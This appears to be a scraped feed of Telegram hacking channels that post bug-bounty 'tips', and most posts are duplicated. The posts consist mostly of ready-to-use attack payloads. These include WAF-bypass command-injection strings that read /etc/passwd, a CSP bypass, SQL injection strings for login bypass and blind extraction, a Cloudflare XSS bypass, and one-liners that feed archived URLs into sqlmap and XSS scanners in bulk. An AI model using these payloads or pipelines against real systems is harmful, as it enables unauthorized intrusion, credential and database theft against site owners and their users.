Not only crawling but you can do Subdomain Enumeration using Wayback.
——————
0Day.Today
@LearnExploit
@Tech_Army
curl --insecure --silent "http://web.archive.org/cdx/search/cdx…" | sed -e 's_https*://__' -e "s/\/.*//" -e 's/:.*//' -e 's/^www\.//' | sed "/@/d" | sed -e 's/\.$//' | sort -u
#bugbounty ——————
0Day.Today
@LearnExploit
@Tech_Army
👍3
Bypass Captcha (Google reCAPTCHA)
1 . Try changing the request method, for example POST to GET
POST / HTTP 1.1
Host: http://target.com
...
_RequestVerificationToken=xxxxxxxxxxxxxx&_Username=daffa&_Password=test123
#bugbounty #bypass
——————
0Day.Today
@LearnExploit
@Tech_Army
1 . Try changing the request method, for example POST to GET
POST / HTTP 1.1
Host: http://target.com
...
_RequestVerificationToken=xxxxxxxxxxxxxx&_Username=daffa&_Password=test123
#bugbounty #bypass
——————
0Day.Today
@LearnExploit
@Tech_Army
👍5
RCE WAF Bypass
;+$u+cat+/etc$u/passwd$u
;+$u+cat+/etc$u/passwd+\#
/???/??t+/???/??ss??
/?in/cat+/et?/passw?
#bugbounty #RCE #bypass
——————
0Day.Today
@LearnExploit
@Tech_Army
;+$u+cat+/etc$u/passwd$u
;+$u+cat+/etc$u/passwd+\#
/???/??t+/???/??ss??
/?in/cat+/et?/passw?
#bugbounty #RCE #bypass
——————
0Day.Today
@LearnExploit
@Tech_Army
👍8
Payload Injector:
➕ Debinject:
😸 GitHub
➕ Pixload:
😸 GitHub
➕ Gospider:
😸 GitHub
#Injection #Hacking_Tool #BugBounty
BugCod3
➗ ➗ ➗ ➗ ➗ ➗ ➗ ➗ ➗ ➗ ➗ ➗
🔥 👤 T.me/LearnExploit
📢 T.me/Tech_Army
#Injection #Hacking_Tool #BugBounty
BugCod3
0Day.Today
Please open Telegram to view this post
VIEW IN TELEGRAM
Please open Telegram to view this post
VIEW IN TELEGRAM
👍1
You can bypass CSP on any website that allows http://microsoft.com in a script-src
PoC:
octagon.net
#BugBounty #bypass #POC
——————
0Day.Today
@LearnExploit
@Tech_Army
PoC:
<script src=http://microsoft.com/en-us/research/wp-json?_jsonp=alert></script>
This works because of the WordPress CSP bypass our engineer (octagon) found last year : octagon.net
#BugBounty #bypass #POC
——————
0Day.Today
@LearnExploit
@Tech_Army
👍5🤔2
another #SQLi found! This time Microsoft SQL Server database vulnerable to stacked queries.
Payload
#VPD #BugBounty #security
➖ ➖ ➖ ➖ ➖ ➖ ➖ ➖ ➖ ➖
🔥
📣 T.me/LearnExploit
Payload
' or 1=1 -- - bypassed the login site, and then confirmed injection point with ';WAITFOR DELAY '0:0:5'-- executing a 5s delay#VPD #BugBounty #security
0Day.Today Please open Telegram to view this post
VIEW IN TELEGRAM
⚡5❤2👍1🔥1
cloudflare WAF bypass XSS
any payload they blocked by cloudflare
this payload working
#Cloudflare #Bugbounty #Tip
➖ ➖ ➖ ➖ ➖ ➖ ➖ ➖ ➖ ➖
📣 T.me/BugCod3
📣 T.me/LearnExploit
any payload they blocked by cloudflare
this payload working
"><img src=x onerrora=confirm() onerror=confirm(1)>#Cloudflare #Bugbounty #Tip
Please open Telegram to view this post
VIEW IN TELEGRAM
❤5⚡3🔥2👍1👏1
Found SQL Injection in [org_id] Cookie
Payloads for Testing:
Injected in request like this
#BugBounty #Tips #SQL
➖ ➖ ➖ ➖ ➖ ➖ ➖ ➖ ➖ ➖
📣 T.me/BugCod3
📣 T.me/LearnExploit
Payloads for Testing:
-1 OR 0=6 AND 0-0=> FALSE-1 OR 6=6 AND 0-0=> TRUEInjected in request like this
Cookie:organization_id=-1%20OR%200%3D6%20AND%200-0#BugBounty #Tips #SQL
Please open Telegram to view this post
VIEW IN TELEGRAM
⚡7❤2🔥1💯1
If you discover an oracle web app, you can use this payload
#BugBounty #Tips
➖➖➖➖➖➖➖➖➖➖
📣 T.me/BugCod3
📣 T.me/LearnExploit
EHY01%27OR+1%3d1+AND+NVL(ASCII(SUBSTR((SELECT+chr(78)%7c%7cchr(69)%7c%7cchr(84)%7c%7cchr(83)%7c%7cchr(80) )%7c%7cchr(65)%7c%7cchr(82)%7c%7cchr(75)%7c%7cchr(69)%7c%7cchr(82)+FROM+DUAL)%2c9%2c1))%2c0) %3d82--#BugBounty #Tips
➖➖➖➖➖➖➖➖➖➖
📣 T.me/BugCod3
📣 T.me/LearnExploit
❤4👍2⚡1🔥1
One line for subdomain
#BugBounty #Tips
➖➖➖➖➖➖➖➖➖➖
📣 T.me/BugCod3
📣 T.me/LearnExploit
$(subfinder -d http://tesla.com| dnsx |httpx); do katana -u "$subdomain" -d 5 -jc -jsl -aff -kf all -mrs 5242880 -timeout 15 -retry 3 -s breadth-first -iqp -cs "$subdomain" -f url -sf url -rl 200 -p 20 -dr -nc -H -silent -fdc 'status_code == 404' ;done#BugBounty #Tips
➖➖➖➖➖➖➖➖➖➖
📣 T.me/BugCod3
📣 T.me/LearnExploit
⚡7👎3👍2❤1
bbscope
Scope gathering tool for HackerOne, Bugcrowd, Intigriti, YesWeHack, and Immunefi!
Need to grep all the large scope domains that you've got on your bug bounty platforms? This is the right tool for the job.
What about getting a list of android apps that you are allowed to test? We've got you covered as well.
Reverse engineering god? No worries, you can get a list of binaries to analyze too :)
Installation:
Make sure you've a recent version of the Go compiler installed on your system. Then just run:
Usage:
Github
⬇️ Download
🔓
#GO #Grabber #Scope #BugBounty
➖➖➖➖➖➖➖➖➖➖
📣 T.me/BugCod3
📣 T.me/LearnExploit
Scope gathering tool for HackerOne, Bugcrowd, Intigriti, YesWeHack, and Immunefi!
Need to grep all the large scope domains that you've got on your bug bounty platforms? This is the right tool for the job.
What about getting a list of android apps that you are allowed to test? We've got you covered as well.
Reverse engineering god? No worries, you can get a list of binaries to analyze too :)
Installation:
Make sure you've a recent version of the Go compiler installed on your system. Then just run:
GO111MODULE=on go install github.com/sw33tLie/bbscope@latest
Usage:
bbscope (h1|bc|it|ywh|immunefi) -t <YOUR_TOKEN> <other-flags>
Github
⬇️ Download
🔓
LearnExploit#GO #Grabber #Scope #BugBounty
➖➖➖➖➖➖➖➖➖➖
📣 T.me/BugCod3
📣 T.me/LearnExploit
⚡4❤2🔥1
Scan for [CVE-2023-49785] ChatGPT-Next-Web - SSRF/XSS
⬇️ Download
🔓
#BugBounty #Nuclei #Templates
➖➖➖➖➖➖➖➖➖➖
📣 T.me/BugCod3
📣 T.me/LearnExploit
⬇️ Download
🔓
BugCod3#BugBounty #Nuclei #Templates
➖➖➖➖➖➖➖➖➖➖
📣 T.me/BugCod3
📣 T.me/LearnExploit
⚡3❤1🔥1
SQL Injection
After this, I used ghauri to extract the database It was successful
#SQL #Injection #ghauri #BugBounty #Tips
➖ ➖ ➖ ➖ ➖ ➖ ➖ ➖ ➖ ➖
📣 T.me/BugCod3
📣 T.me/LearnExploit
After this, I used ghauri to extract the database It was successful
-11+PROCEDURE+ANALYSE(EXTRACTVALUE(9859,CONCAT(0x5c,(BENCHMARK(110000000,MD5(0x7562756f))))),1)--#SQL #Injection #ghauri #BugBounty #Tips
Please open Telegram to view this post
VIEW IN TELEGRAM
⚡8🔥3👍2❤1
SQLMap from Waybackurls
#Sqlmap #BugBounty #Tips
➖ ➖ ➖ ➖ ➖ ➖ ➖ ➖ ➖ ➖
📣 T.me/BugCod3
📣 T.me/LearnExploit
waybackurls target | grep -E '\bhttps?://\S+?=\S+' | grep -E '\.php|\.asp' | sort -u | sed 's/\(=[^&]*\)/=/g' | tee urls.txt | sort -u -o urls.txt && cat urls.txt | xargs -I{} sqlmap --technique=T --batch -u "{}"#Sqlmap #BugBounty #Tips
Please open Telegram to view this post
VIEW IN TELEGRAM
⚡5🔥3❤2👍1
xss oneliner command
⬇️ Download ( Tools )
🔒
🔒
#XSS #BugBounty #Oneliner #Tips
➖ ➖ ➖ ➖ ➖ ➖ ➖ ➖ ➖ ➖
📣 T.me/BugCod3
📣 T.me/LearnExploit
echo "testphp.vulnweb.com" | waybackurls | egrep -iv ".(jpg|jpeg|gif|css|tif|tiff|png|ttf|woff|woff2|icon|pdf|svg|txt|js)" | urldedupe -s | grep -IE "[?].*[&]?" | grep "=" | unew -p | pvreplace '<sCript>confirm(1)</sCript>, <script>confirm(1)</script>' | xsschecker -match '<sCript>confirm(1)</sCript>, <script>confirm(1)</script>' -vulnBugCod3 ( ZIP )LearnExploit ( BOT )#XSS #BugBounty #Oneliner #Tips
Please open Telegram to view this post
VIEW IN TELEGRAM
🔥4⚡3❤2👍2
Sql Injection
Payload :
Parameter:
#BugBounty #Tips #sql_injection
➖ ➖ ➖ ➖ ➖ ➖ ➖ ➖ ➖ ➖
👤 T.me/BugCod3BOT
📣 T.me/BugCod3
Payload :
-10'XOR(if(now()=sysdate(),sleep(20),0))XOR'ZParameter:
cart/-10+payload#BugBounty #Tips #sql_injection
Please open Telegram to view this post
VIEW IN TELEGRAM
⚡9❤4🔥3
✅ Article introducing and exploiting 4 bugs
✅ مقاله ی معرفی و اکسپلویت کردن 4 باگ :
#Article
#Exploit #Xploit #Bugbounty
#Bug #SSRF #CSRF #SSO
➖➖➖➖➖➖➖➖
♨️ IR0Day.Today Bax ♨️
⚠️ @LearnExploit
✅ مقاله ی معرفی و اکسپلویت کردن 4 باگ :
1. path traversal
2. business logic
3. single sign-on (SSO) Misconfiguration
4. Insecure Deserialization
#Article
#Exploit #Xploit #Bugbounty
#Bug #SSRF #CSRF #SSO
➖➖➖➖➖➖➖➖
♨️ IR0Day.Today Bax ♨️
⚠️ @LearnExploit
Article introducing and exploiting 4 bugs.pdf
376.6 KB
✅ Article introducing and exploiting 4 bugs
✅ مقاله ی معرفی و اکسپلویت کردن 4 باگ :
#Article
#Exploit #Xploit #Bugbounty
#Bug #SSRF #CSRF #SSO
➖➖➖➖➖➖➖➖
♨️ IR0Day.Today Bax ♨️
⚠️ @LearnExploit
✅ مقاله ی معرفی و اکسپلویت کردن 4 باگ :
1. path traversal
2. business logic
3. single sign-on (SSO) Misconfiguration
4. Insecure Deserialization
#Article
#Exploit #Xploit #Bugbounty
#Bug #SSRF #CSRF #SSO
➖➖➖➖➖➖➖➖
♨️ IR0Day.Today Bax ♨️
⚠️ @LearnExploit